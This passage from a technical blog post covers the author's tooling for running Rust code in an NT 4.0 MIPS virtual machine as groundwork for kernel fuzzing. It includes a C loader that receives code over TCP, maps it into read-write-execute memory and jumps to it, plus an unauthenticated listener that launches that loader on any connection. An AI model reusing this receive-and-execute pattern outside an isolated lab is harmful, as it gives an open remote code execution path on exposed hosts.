<span class="k">if</span><span class="p">(</span><span class="n">recv</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">len</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">len</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">!=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">len</span><span class="p">))</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"recv() error : %d"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Read the payload</span>
<span class="n">buf</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">len</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="n">buf</span><span class="p">)</span> <span class="p">{</span>
<span class="n">perror</span><span class="p">(</span><span class="s">"malloc() error "</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">while</span><span class="p">(</span><span class="n">off</span> <span class="o"><</span> <span class="n">len</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">int</span> <span class="n">bread</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">remain</span> <span class="o">=</span> <span class="n">len</span> <span class="o">-</span> <span class="n">off</span><span class="p">;</span>
<span class="n">bread</span> <span class="o">=</span> <span class="n">recv</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buf</span> <span class="o">+</span> <span class="n">off</span><span class="p">,</span> <span class="n">remain</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">bread</span> <span class="o"><=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"recv(pl) error : %d"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">off</span> <span class="o">+=</span> <span class="n">bread</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Read everything %u</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">off</span><span class="p">);</span>
<span class="c1">// FELF0001 + u64 entry + u64 base</span>
<span class="k">if</span><span class="p">(</span><span class="n">len</span> <span class="o"><</span> <span class="mi">3</span> <span class="o">*</span> <span class="mi">8</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Invalid FELF</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="n">buf</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">entry</span><span class="p">,</span> <span class="n">base</span><span class="p">,</span> <span class="n">hi</span><span class="p">,</span> <span class="n">end</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="n">memcmp</span><span class="p">(</span><span class="n">ptr</span><span class="p">,</span> <span class="s">"FELF0001"</span><span class="p">,</span> <span class="mi">8</span><span class="p">))</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Missing FELF header</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ptr</span> <span class="o">+=</span> <span class="mi">8</span><span class="p">;</span>
<span class="n">entry</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">)</span><span class="o">++</span><span class="p">;</span>
<span class="n">hi</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">)</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="n">hi</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Unhandled 64-bit address</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">base</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">)</span><span class="o">++</span><span class="p">;</span>
<span class="n">hi</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">)</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="n">hi</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Unhandled 64-bit address</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">end</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="p">(</span><span class="n">len</span> <span class="o">-</span> <span class="mi">3</span> <span class="o">*</span> <span class="mi">8</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Loading at %x-%x (%x) entry %x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">base</span><span class="p">,</span> <span class="n">end</span><span class="p">,</span> <span class="n">end</span> <span class="o">-</span> <span class="n">base</span><span class="p">,</span> <span class="n">entry</span><span class="p">);</span>
<span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">align_base</span> <span class="o">=</span> <span class="n">base</span> <span class="o">&</span> <span class="o">~</span><span class="mh">0xffff</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">align_end</span> <span class="o">=</span> <span class="p">(</span><span class="n">end</span> <span class="o">+</span> <span class="mh">0xffff</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="mh">0xffff</span><span class="p">;</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">alloc</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">align_base</span><span class="p">,</span>
<span class="n">align_end</span> <span class="o">-</span> <span class="n">align_base</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span>
<span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Alloc attempt %x-%x (%x) | Got %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
<span class="n">align_base</span><span class="p">,</span> <span class="n">align_end</span><span class="p">,</span> <span class="n">align_end</span> <span class="o">-</span> <span class="n">align_base</span><span class="p">,</span> <span class="n">alloc</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">alloc</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">align_base</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"VirtualAlloc() error : %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Copy in the code</span>
<span class="n">memcpy</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">base</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="n">end</span> <span class="o">-</span> <span class="n">base</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// Jump to the entry</span>
<span class="p">((</span><span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="p">)(</span><span class="n">SOCKET</span><span class="p">))</span><span class="n">entry</span><span class="p">)(</span><span class="n">sock</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>It’s not the best quality code, but it gets the job done. Nevertheless, this
allows us to run whatever Rust program we develop in the VM! Running this
client executable is all we need now.</p>
<h4 id="remote-remote-code-execution">Remote remote code execution</h4>
<p>Unfortunately, having to switch to the VM, hit up arrow, and enter, is honestly
a lot more than I want to have in my build process. I kind of think any build,
dev, and test cycle that takes longer than a few seconds is just too painful
to use. I don’t really care how complex the project is. In
<a href="https://github.com/gamozolabs/chocolate_milk">Chocolate Milk</a> I demonstrated
that I could build, upload to my server, hot replace, download Windows VM
images, and launch hundreds of Windows VMs as part of my sub-2-second build
process. This is an OS and hypervisor with hotswapping and re-launching
of hundreds of Windows VMs in seconds (I think milliseconds for the upload,
hot swap, and Windows VM launches if you ignore the 1-2 second Rust build).
There’s just no excuse for shitty build and test processes for small projects
like this.</p>
<p>Okay, very subtle flex aside, we need a better process. Luckily, we can
remotely execute our remote code. To do this I created a server that runs
inside the guest that waits for connections. On a connection it simply calls
<code class="language-plaintext highlighter-rouge">CreateProcess()</code> and launches the client we talked about before. Now, we can
“poke” the guest simply by connecting to and disconnecting from the TCP port we
forwarded.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>
</span>
<span class="kt">int</span>
<span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SOCKET</span> <span class="n">sock</span><span class="p">;</span>
<span class="n">WSADATA</span> <span class="n">wsaData</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sockaddr</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="c1">// Initialize WSA</span>
<span class="k">if</span><span class="p">(</span><span class="n">WSAStartup</span><span class="p">(</span><span class="n">MAKEWORD</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">),</span> <span class="o">&</span><span class="n">wsaData</span><span class="p">))</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"WSAStartup() error : %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Create TCP socket</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="n">IPPROTO_TCP</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">sock</span> <span class="o">==</span> <span class="n">INVALID_SOCKET</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"socket() error : %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="s">"0.0.0.0"</span><span class="p">);</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="mi">42069</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">bind</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">sockaddr</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sockaddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sockaddr</span><span class="p">))</span> <span class="o">==</span> <span class="n">SOCKET_ERROR</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"bind() error : %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Listen for connections</span>
<span class="k">if</span><span class="p">(</span><span class="n">listen</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span> <span class="o">==</span> <span class="n">SOCKET_ERROR</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"listen() error : %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Wait for a client</span>
<span class="k">for</span><span class="p">(</span> <span class="p">;</span> <span class="p">;</span> <span class="p">)</span> <span class="p">{</span>
<span class="n">STARTUPINFO</span> <span class="n">si</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">PROCESS_INFORMATION</span> <span class="n">pi</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">SOCKET</span> <span class="n">client</span> <span class="o">=</span> <span class="n">accept</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="c1">// Upon getting a TCP connection, just start</span>
<span class="c1">// a separate client process. This way the</span>
<span class="c1">// client can crash and burn and this server</span>
<span class="c1">// stays running just fine.</span>
<span class="n">CreateProcess</span><span class="p">(</span>
<span class="s">"client.exe"</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="n">FALSE</span><span class="p">,</span>
<span class="n">CREATE_NEW_CONSOLE</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="o">&</span><span class="n">si</span><span class="p">,</span>
<span class="o">&</span><span class="n">pi</span>
<span class="p">);</span>
<span class="c1">// We don't even transfer data, we just care about</span>
<span class="c1">// the connection kicking off a client.</span>
<span class="n">closesocket</span><span class="p">(</span><span class="n">client</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Very fancy code. Anyways with this in place, now we can just add a
<code class="language-plaintext highlighter-rouge">nc -w 0 127.0.0.1 5555</code> to our <code class="language-plaintext highlighter-rouge">Makefile</code>, and now the VM will download and
run the new code we build. Combine this with <code class="language-plaintext highlighter-rouge">cargo watch</code> and now when we
save one of the Rust files we’re working on, it’ll build, poke the VM, and
run it! A simple <code class="language-plaintext highlighter-rouge">:w</code> and we have instant results from the VM!</p>
<p>(If you’re wondering, we create the client in a different process so we don’t
lose the server if the client crashes, which it will)</p>
<h2 id="rust-without-os-support">Rust without OS support</h2>
<p>Rust is designed to have a split of some of the core features of the language.
There’s <code class="language-plaintext highlighter-rouge">core</code> which contains the bare essentials to have a usable language,
<code class="language-plaintext highlighter-rouge">alloc</code> which gives you access to dynamic allocations, and <code class="language-plaintext highlighter-rouge">std</code> which gives
you an OS-agnostic wrapper around common OS-level constructs like files, threads,
and sockets.</p>
<p>Unfortunately, Rust doesn’t have support for NT4.0 on MIPS, so we immediately
don’t have the ability to use <code class="language-plaintext highlighter-rouge">std</code>. However, we can still use <code class="language-plaintext highlighter-rouge">core</code> and
<code class="language-plaintext highlighter-rouge">alloc</code> with a small amount of work.</p>
<p>Rust has some of the best cross-compilation support of any compiler, as you
can simply have Rust build <code class="language-plaintext highlighter-rouge">core</code> for your target, even if you don’t have a
pre-compiled package. <code class="language-plaintext highlighter-rouge">core</code> is simple enough that it builds in a few
seconds, so it doesn’t really complicate your build. Seriously, look how cool
this is:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cargo new <span class="nt">--bin</span> rustexample
</code></pre></div></div>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#![no_std]</span>
<span class="nd">#![no_main]</span>
<span class="nd">#[panic_handler]</span>
<span class="k">fn</span> <span class="nf">panic_handler</span><span class="p">(</span><span class="mi">_</span><span class="n">info</span><span class="p">:</span> <span class="o">&</span><span class="nn">core</span><span class="p">::</span><span class="nn">panic</span><span class="p">::</span><span class="n">PanicInfo</span><span class="p">)</span> <span class="k">-></span> <span class="o">!</span> <span class="p">{</span>
<span class="k">loop</span> <span class="p">{}</span>
<span class="p">}</span>
<span class="nd">#[no_mangle]</span>
<span class="k">pub</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="k">fn</span> <span class="mi">__</span><span class="nf">start</span><span class="p">()</span> <span class="k">-></span> <span class="o">!</span> <span class="p">{</span>
<span class="nd">unimplemented!</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pleb@gamey ~/rustexample <span class="nv">$ </span>cargo build <span class="nt">--target</span> mipsel-unknown-none <span class="nt">-Zbuild-std</span><span class="o">=</span>core
Compiling core v0.0.0 <span class="o">(</span>/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core<span class="o">)</span>
Compiling compiler_builtins v0.1.49
Compiling rustc-std-workspace-core v1.99.0 <span class="o">(</span>/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/rustc-std-workspace-core<span class="o">)</span>
Compiling rustexample v0.1.0 <span class="o">(</span>/home/pleb/rustexample<span class="o">)</span>
Finished dev <span class="o">[</span>unoptimized + debuginfo] target<span class="o">(</span>s<span class="o">)</span> <span class="k">in </span>8.84s
</code></pre></div></div>
<p>And there you go, you have a Rust binary for <code class="language-plaintext highlighter-rouge">mipsel-unknown-none</code> without
having to download any pre-built toolchains, a libc, anything. You can
immediately start building your program, using Rust-level constructs like
slices and arrays with bounds checking, closures, whatever. No libc, no
pre-built target-specific toolchains, nothing.</p>
<h2 id="os-development-in-user-land">OS development in user-land</h2>
<p>For educational reasons, and totally not because I just find it more fun, I
decided that this project would not leverage the C libraries that do indeed
exist in the MIPS guest. We could of course write PE importers
to leverage the existing <code class="language-plaintext highlighter-rouge">kernel32.dll</code> and <code class="language-plaintext highlighter-rouge">user32.dll</code> present in all Windows
processes by default, but no, that’s not fun. We can justify this by saying
that the goal of this project is to fuzz the NT kernel, and thus we need to
understand what syscalls look like.</p>
<p>So, with that in mind, we’re basically on our own. We’re effectively writing an
OS in user-land, as we have absolutely no libraries or features by default. We
have to write our own inline assembly and work with raw pointers to bootstrap our
execution environment for Rust.</p>
<p>The very first thing we need is a way of outputting debug information. I don’t
care how we do this. It could be a file, a socket, the stdout, who cares. To
do this, we’ll need to ask the kernel to do something via a syscall.</p>
<h3 id="syscall-layer">Syscall Layer</h3>
<p>To invoke syscalls, we need to conform to a somewhat “custom” calling
convention. System calls are effectively always indexed by some integer,
selecting the API that you want to invoke. In the case of MIPS this index goes in
the <code class="language-plaintext highlighter-rouge">$v0</code> register, which is not normally used by the standard calling convention. Thus,
to perform a syscall with this modified convention, we have to use some
assembly. Luckily, the rest of the calling convention for syscalls is
unmodified from the standard MIPS <code class="language-plaintext highlighter-rouge">o32</code> ABI, and we can pass through everything
else.</p>
<p>To pass everything as-is to the syscall, we have to make sure Rust
is using the same ABI as the kernel. We do this by declaring our function as
<code class="language-plaintext highlighter-rouge">extern</code>, which switches us to the default MIPS <code class="language-plaintext highlighter-rouge">o32</code> C ABI. Technically I
think Windows does floating-point register passing differently than <code class="language-plaintext highlighter-rouge">o32</code>, but
we’ll cross that bridge when we get there.</p>
<p>We need to be confident that the compiler is not emitting some weird prologue
or moving around registers in our syscall function, and luckily Rust comes
to the rescue again with a <code class="language-plaintext highlighter-rouge">#[naked]</code> function decorator. This marks the
function as never inline-able, and also guarantees that no prologue or epilogue is
present in the function. This is common in a lot of low-level languages, but
Rust goes a step further and requires that naked functions only contain a
single assembly statement that must not return (you must manually handle the
return), and that your assembly is the first code that executes. Ultimately,
it’s really just a global label on inline assembly with type information.
Sweet.</p>
<p>So, we simply have to write a syscall helper for each number of arguments we
want to support like such:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// 2-argument syscall</span>
<span class="nd">#[allow(unused)]</span>
<span class="nd">#[naked]</span>
<span class="k">pub</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="k">fn</span> <span class="nf">syscall2</span><span class="p">(</span><span class="mi">_</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="mi">_</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">id</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-></span> <span class="nb">usize</span> <span class="p">{</span>
<span class="nd">asm!</span><span class="p">(</span><span class="s">r#"
move $v0, $a2
syscall
"#</span><span class="p">,</span> <span class="nf">options</span><span class="p">(</span><span class="n">noreturn</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We mark the function as naked, pass in the syscall ID as the last parameter
(as to not disturb the ordering of the earlier parameters which we pass through
to the syscall), move the syscall ID to <code class="language-plaintext highlighter-rouge">$v0</code>, and invoke the syscall. Weirdly,
for MIPS, the syscall does not return to the instruction after the <code class="language-plaintext highlighter-rouge">syscall</code>;
it actually returns to <code class="language-plaintext highlighter-rouge">$ra</code>, the return address, so it’s critical that the
function is never inlined as this wrapper relies on returning back to the
call site of the caller of <code class="language-plaintext highlighter-rouge">syscall2()</code>. Luckily, naked ensures this for us,
and thus this wrapper is sufficient for syscalls!</p>
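<p>Above the raw helpers you can then build typed wrappers that hide both the syscall ID and the <code class="language-plaintext highlighter-rouge">unsafe</code>. A minimal sketch of that layering, with a stand-in <code class="language-plaintext highlighter-rouge">syscall2()</code> (on the real target it would be the naked MIPS stub above; the <code class="language-plaintext highlighter-rouge">0x0f</code> syscall number is made up for illustration):</p>

```rust
/// NTSTATUS-style result wrapper, mirroring the shape used later in
/// the post.
#[derive(Debug, PartialEq)]
struct NtStatus(usize);

// Stand-in for the real #[naked] helper: on MIPS this would move `id`
// into $v0 and execute `syscall`; here it just logs the call so the
// layering can run on a hosted target.
unsafe extern "C" fn syscall2(a0: usize, a1: usize, id: usize) -> usize {
    println!("syscall {:#x}({:#x}, {:#x})", id, a0, a1);
    0 // pretend STATUS_SUCCESS
}

// A typed wrapper: callers pass normal arguments in order, and the ID
// rides along in the last slot so $a0..$a1 flow through untouched.
fn nt_close(handle: usize) -> NtStatus {
    NtStatus(unsafe { syscall2(handle, 0, 0x0f) })
}

fn main() {
    assert_eq!(nt_close(4), NtStatus(0));
}
```

<p>This is why the ID goes last: everything before it is already in the right register for the kernel.</p>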
<h3 id="getting-output">Getting output</h3>
<p>Back to the console: we initially started with trying to use stdout, but
according to Twitch chat it sounds like in old Windows this was actually done via
some RPC with conhost. So, we abandoned that. We wrote a tiny example of using
a <code class="language-plaintext highlighter-rouge">NtOpenFile()</code> and <code class="language-plaintext highlighter-rouge">NtWriteFile()</code> syscall to drop a file to disk with a log,
and this was a cool example of early syscalls, but still not convenient.</p>
<p>Remember, I’m picky about the development cycle.</p>
<p>So, we decided to go with a socket for our final build. Unfortunately, creating
a socket in Windows via syscalls is actually pretty hard (I think it’s done
mainly over IOCTLs), but we cheated here and just passed the handle from the
FELF loader that already had to connect to our host. We can simply change our
FELF server to serve the FELF to the VM and then <code class="language-plaintext highlighter-rouge">recv()</code> forever, printing out
the console output. Now we have a remote console output.</p>
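<p>The host side of that loop is simple enough to sketch. Here is a hypothetical, self-contained Rust model of it (with an in-process stand-in for the guest and a placeholder byte string instead of a real FELF): send the payload on connect, then treat everything received afterwards as console output.</p>

```rust
use std::io::{Read, Write};
use std::net::{TcpListener, TcpStream};
use std::thread;

// Host side: hand the payload to whoever connects, then collect
// whatever they send back until the socket closes.
fn serve_once(listener: TcpListener, payload: &'static [u8]) -> Vec<u8> {
    let (mut sock, _) = listener.accept().unwrap();
    sock.write_all(payload).unwrap();
    let mut out = Vec::new();
    sock.read_to_end(&mut out).unwrap();
    out
}

fn main() {
    // Stand-in payload; a real server would send the FELF file here.
    let payload: &'static [u8] = b"FELF0001...";

    let listener = TcpListener::bind("127.0.0.1:0").unwrap();
    let addr = listener.local_addr().unwrap();
    let server = thread::spawn(move || serve_once(listener, payload));

    // Fake "guest": consume the payload, then reuse the same socket as
    // a console by writing log bytes back.
    let mut guest = TcpStream::connect(addr).unwrap();
    let mut first = vec![0u8; payload.len()];
    guest.read_exact(&mut first).unwrap();
    assert_eq!(first, payload);
    guest.write_all(b"hello from the guest\n").unwrap();
    drop(guest);

    let out = server.join().unwrap();
    print!("{}", String::from_utf8_lossy(&out)); // prints "hello from the guest"
}
```

<p>Because the guest keeps the connected handle, the same socket doubles as payload transport and debug console.</p>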
<h3 id="windows-syscalls">Windows Syscalls</h3>
<p>Windows syscalls are a lot heavier than what you might be used to on UNIX, and they
are also sometimes undocumented. Luckily, the <code class="language-plaintext highlighter-rouge">NtWriteFile()</code> syscall that
we really need is actually not too bad. It takes a file handle, some optional
stuff we don’t care about, an <code class="language-plaintext highlighter-rouge">IO_STATUS_BLOCK</code> (which returns number of
bytes written), a buffer, a length, and an offset in the file to write to.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Write to a file</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">write</span><span class="p">(</span><span class="n">fd</span><span class="p">:</span> <span class="o">&</span><span class="n">Handle</span><span class="p">,</span> <span class="n">bytes</span><span class="p">:</span> <span class="k">impl</span> <span class="n">AsRef</span><span class="o"><</span><span class="p">[</span><span class="nb">u8</span><span class="p">]</span><span class="o">></span><span class="p">)</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span> <span class="p">{</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0u64</span><span class="p">;</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">iosb</span> <span class="o">=</span> <span class="nn">IoStatusBlock</span><span class="p">::</span><span class="nf">default</span><span class="p">();</span>
<span class="c">// Perform syscall</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">NtStatus</span><span class="p">(</span><span class="k">unsafe</span> <span class="p">{</span>
<span class="nf">syscall9</span><span class="p">(</span>
<span class="c">// [in] HANDLE FileHandle</span>
<span class="n">fd</span><span class="na">.0</span><span class="p">,</span>
<span class="c">// [in, optional] HANDLE Event</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// [in, optional] PIO_APC_ROUTINE ApcRoutine,</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// [in, optional] PVOID ApcContext,</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// [out] PIO_STATUS_BLOCK IoStatusBlock,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">iosb</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] PVOID Buffer,</span>
<span class="n">bytes</span><span class="nf">.as_ref</span><span class="p">()</span><span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] ULONG Length,</span>
<span class="n">bytes</span><span class="nf">.as_ref</span><span class="p">()</span><span class="nf">.len</span><span class="p">(),</span>
<span class="c">// [in, optional] PLARGE_INTEGER ByteOffset,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">offset</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in, optional] PULONG Key</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// Syscall number</span>
<span class="nn">Syscall</span><span class="p">::</span><span class="n">WriteFile</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span>
<span class="p">}</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">);</span>
<span class="c">// If success, return number of bytes written, otherwise return error</span>
<span class="k">if</span> <span class="n">status</span><span class="nf">.success</span><span class="p">()</span> <span class="p">{</span>
